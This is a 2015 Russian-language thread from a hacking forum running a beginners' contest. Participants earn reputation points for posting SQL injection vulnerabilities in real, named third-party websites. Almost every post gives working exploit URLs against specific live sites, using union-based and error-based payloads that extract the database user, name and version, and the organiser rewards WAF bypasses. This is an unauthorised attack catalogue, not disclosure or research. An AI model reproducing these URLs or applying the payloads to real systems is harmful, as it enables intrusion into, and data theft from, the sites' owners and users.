Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Правила:
    Ваша задача найти уязвимости в веб-приложениях.
    Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" :)).
    Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.
    За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).
    В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:

    Уязвимости:
    • SQL Injection (2 балла)
    • Stored XSS (2 балла)
    • Reflected XSS (1 балл)
    • Local File Inclusion (3 балла)
    • Remote File Inclusion (4 балла)
    • Remote Code Execution (5 баллов)
    • XXE (5 баллов)
    • Arbitary File Read (3 балла)

    Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/

    Типы уязвимостей:
    • Оранжевые (с приложенным исходным кодом уязвимости)
    • Серые (эксплоит без кода)
     
    _________________________
  2. dmn75

    dmn75 Member

    Joined:
    11 May 2015
    Messages:
    46
    Likes Received:
    47
    Reputations:
    1
    Буду первым. Если что не так подправьте
    Site: dkcity.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
    Site: knitty.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
     
    #2 dmn75, 4 Jun 2015
    Last edited by a moderator: 4 Jun 2015
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.

    P. S. активнее, ребят :)
     
    _________________________
    december_16 and Billi Damn like this.
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    исходники с уязвимостью прибавляют баллы, но можно и без них
     
    _________________________
  6. dmn75

    dmn75 Member

    Joined:
    11 May 2015
    Messages:
    46
    Likes Received:
    47
    Reputations:
    1
    Да, тулзой кручу.


    Сайт: theatreinchicago.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8

    Сайт: tsgconsumer.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0

    Сайт: alicekwartler.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]

    Сайт: athenscine.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20

    Сайт: classifieds.chiangmaicitylife.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1

    Сайт: cstv.collegesports.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5

    Сайт: ctnrecruiting.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

    Сайт: diarionecochea.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo

    Сайт: dogarchive.kennel-apbt.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1

    Сайт: eu.bosscom.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://eu.bosscom.com/product.asp?id=[t]
    Какой именно запрос на вывод нужен?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    если blind, то хотя бы substring версии
     
    _________________________
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.
     
    _________________________
    Take_IT likes this.
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    а разница? :)
     
    _________________________
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    Для развеивания шаблонного мышления.
     
    _________________________
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    я засчитал все те, что с выводом, не болкируются wafом и не присутствуют уже где-либо, остальные либо докручивайте, либо ищите с выводом, если не получается.
     
    _________________________
  12. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    40
    Likes Received:
    23
    Reputations:
    17
    Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.

    Сайт: isotropix.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9%20union%20all%20select%201,2,3,4,5,6,999,8,9,10,11,12,13,14,15,16,17,18
    Сайт: judgement-yard.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.judgement-yard.com/index.php?pageID=999999.9%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,999,12,13,14,15&detail=log&id=75
    Сайт: newchristian.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://newchristian.com/view.php?id=999999.9%20union%20all%20select%201,2,999
    Сайт: patagonianshells.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://patagonianshells.com/index.php?link=home&seccion=999999.9%20union%20all%20select%201,2,3,4,999,6--
    Сайт: rhodesnow.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9%22%20union%20all%20select%20,1,2%20and%20%220%22=%220&lang=english
    Сайт: seavernon.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.seavernon.com/index.php?id=22&lg=fr%20or%201=999%20and%201=1
    Сайт: watch-clock.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=999
     
    #12 Печа, 7 Jun 2015
    Last edited: 15 Jun 2015
    qwaszx000 likes this.
  13. Rypjaer

    Rypjaer Banned

    Joined:
    23 May 2015
    Messages:
    4
    Likes Received:
    1
    Reputations:
    2
    Сайт: www.justintime.in
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+
    Сайт: www.hergolfgame.com
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10+--+
    Сайт: www.secretslk.com
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r
    Сайт: dianaboutiquebd.com
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
    Сайт: www.localfirstaz.com
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
     
    qwaszx000 likes this.
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    добавил в таблицу.
    на blind нужен вывод, для остальных уберите это [t], которое добавляет софт, чтобы был нормальный вывод
     
    _________________________
  15. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    46
    Likes Received:
    19
    Reputations:
    11
    Сайт: hexonline.co.uk
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-
    Сайт: fleurlis.com.tw
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9+--+-
    Сайт: pnelsoncomposer.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3+--+-
    Сайт: puccimanuli.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%29,version%28%29%29,3,4,5,6,7,8+--+
    Сайт: boutique.rrconcept.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%28RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+
     
    #15 3nvY, 11 Jun 2015
    Last edited: 12 Jun 2015
    qwaszx000 and K800 like this.
  16. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    #16 semen6192, 14 Jun 2015
    Last edited by a moderator: 14 Jun 2015
    qwaszx000 likes this.
  17. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    40
    Likes Received:
    23
    Reputations:
    17
    Сайт: http://www.yd1688.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    предыдущие поправьте на нормальный вывод.
    все, 20 баллов набрано, поздравляю!
     
    _________________________
    3nvY likes this.
  19. Neon2211

    Neon2211 New Member

    Joined:
    15 Jun 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Cайт:http://www.cygnethome.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--
    Сайт:http://www.blcontrol.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20select%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0
    Сайт:http://gobpo.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%20999,2--
    Cайт:http://store.schulmerichbells.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20select%20999,2,3
    Cайт:http://www.immobilien-niederzier.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,999
    Сайт:http://www.focus-lighting.com/
    Уязвимость:
    Эксплойт:
    Code:
    http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%201,2,3,4,5,6,7,999,9
     
    #19 Neon2211, 15 Jun 2015
    Last edited by a moderator: 15 Jun 2015
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    очень много повторов, два из них отсюда: http://pastebin.com/tRpAyh1t
     
    _________________________
Loading...